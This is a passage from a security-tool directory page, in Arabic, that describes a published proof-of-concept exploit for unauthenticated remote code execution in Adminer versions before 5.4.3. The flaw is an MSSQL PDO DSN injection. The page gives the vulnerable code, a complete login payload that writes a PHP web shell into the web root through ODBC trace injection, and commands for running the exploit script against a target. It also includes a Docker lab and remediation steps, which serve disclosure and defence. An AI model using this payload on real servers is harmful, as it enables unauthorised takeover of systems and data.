Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-56705 — استغلال PoC لثغرة Adminer < 5.4.3 في تنفيذ الأوامر عن بُعد (RCE) غير المصادق عليه عبر حقن DSN الخاص بـ MSSQL PDO، بما في ذلك مختبر Docker واختبار سلبي. | Kitploit
أدوات/GitHubGitHub/boreas37/cve-2026-56705
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمالفريق الأحمرمختبرات وتدريب عملي
GitHubboreas37/cve-2026-56705

CVE-2026-56705

استغلال PoC لثغرة Adminer < 5.4.3 في تنفيذ الأوامر عن بُعد (RCE) غير المصادق عليه عبر حقن DSN الخاص بـ MSSQL PDO، بما في ذلك مختبر Docker واختبار سلبي.

عرض المستودع
2منذ يوم واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-56705: Adminer < 5.4.3 — ثغرة تنفيذ أوامر عن بُعد غير مصادق عليها عبر حقن DSN في MSSQL PDO

CVECVE-2026-56705
GHSAGHSA-r4x9-5m63-3vxw (استشارة البائع) / GHSA-34q8-53jm-qc2r (قاعدة بيانات GitHub)
المنتجAdminer (أداة إدارة قواعد بيانات PHP بملف واحد)
الإصدارات المتأثرةAdminer < 5.4.3 مع pdo_sqlsrv + برنامج تشغيل Microsoft ODBC لـ SQL Server
تم الإصلاح في5.4.3
CVSS9.8 حرجة (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
النوعCWE-20 ← كتابة ملفات تعسفية غير مصادق عليها ← تنفيذ أوامر عن بُعد

الملخص

يفشل Adminer في تعقيم حقل server الذي يقدمه المستخدم قبل بناء PDO DSN لاتصالات MSSQL:

root@kitploit:~
// adminer/drivers/mssql.inc.php
function attach(string $server, string $username, string $password): string {
    list($host, $port) = host_port($server);
    return $this->dsn("sqlsrv:Server=$host" . ($port ? ",$port" : ""), $username, $password);
}

تُعامل الفواصل المنقوطة في server كمحددات لخصائص اتصال ODBC، لذا يمكن لمهاجم غير مصادق عليه إلحاق خصائص تعسفية بـ DSN — بما في ذلك TraceFile و TraceOn. تكتب ميزة تتبع unixODBC سلسلة الاتصال الكاملة (مع UID={username} حرفيًا) إلى TraceFile قبل وبغض النظر عن نجاح محاولة الاتصال. حقن كود PHP عبر حقل username وتوجيه TraceFile إلى جذر الويب ينتج عنه قشرة ويب.

يكفي طلب POST واحد لتسجيل الدخول دون مصادقة. لا حاجة لبيانات اعتماد صالحة، ولا تفاعل من المستخدم.

الاستغلال

root@kitploit:~
auth[driver]   = mssql
auth[server]   = 127.0.0.1;TraceFile=/var/www/shell.php;TraceOn=1
auth[username] = <?php echo 'POC::'.shell_exec($_GET['c']);?>
auth[password] = x
  1. طلب تسجيل الدخول POST يبني DSN sqlsrv:Server=127.0.0.1;TraceFile=/var/www/shell.php;TraceOn=1
  2. يكتب مدير برنامج تشغيل ODBC تتبعًا يحتوي على UID={<?php ... ?>} إلى /var/www/shell.php
  3. يفشل الاتصال (متوقع وغير ذي صلة) — الملف مكتوب بالفعل
  4. GET /shell.php?c=id ← يتم تنفيذ الأمر

الاستخدام

root@kitploit:~
# بصمة فقط
python3 poc.py --target http://target/adminer.php --check

# استغلال كامل (يكتب <random>.php في جذر الويب)
python3 poc.py --target http://target/adminer.php --command "id"

إعادة الإنتاج في المختبر

root@kitploit:~
cd lab/
docker build -t adminer-cve-2026-56705 .
docker run -d -p 8081:8081 adminer-cve-2026-56705
python3 ../poc.py --target http://localhost:8081/adminer.php --command id

تعكس صورة المختبر متطلبات الاستشارة بدقة: php:8.3-cli + pdo_sqlsrv (pecl) + msodbcsql18، مع جذر ويب قابل للكتابة بواسطة عملية PHP.

المعالجة

  • قم بالترقية إلى Adminer 5.4.3+.
  • إذا تعذرت الترقية فورًا: قم بإزالة/حظر برنامج تشغيل mssql، أو جرّد الفواصل المنقوطة ; (والمسافات) من قيم server المقدمة من المستخدم عند وكيل عكسي.
  • قيّد جذر الويب ضد الكتابة من مستخدم PHP-FPM/CLI كدفاع متعمق.

الإشادة

تنسب استشارة البائع الاكتشاف بشكل مشترك إلى المُبلّغ و Yashar Shahinzadeh (@voorivex).

PoC والمختبر: Hamza Cagrici (@Boreas37)

الجدول الزمني

التاريخالحدث
2026-08-25نشر CVE / تم الإصلاح في Adminer 5.4.3
تنزيل الأداة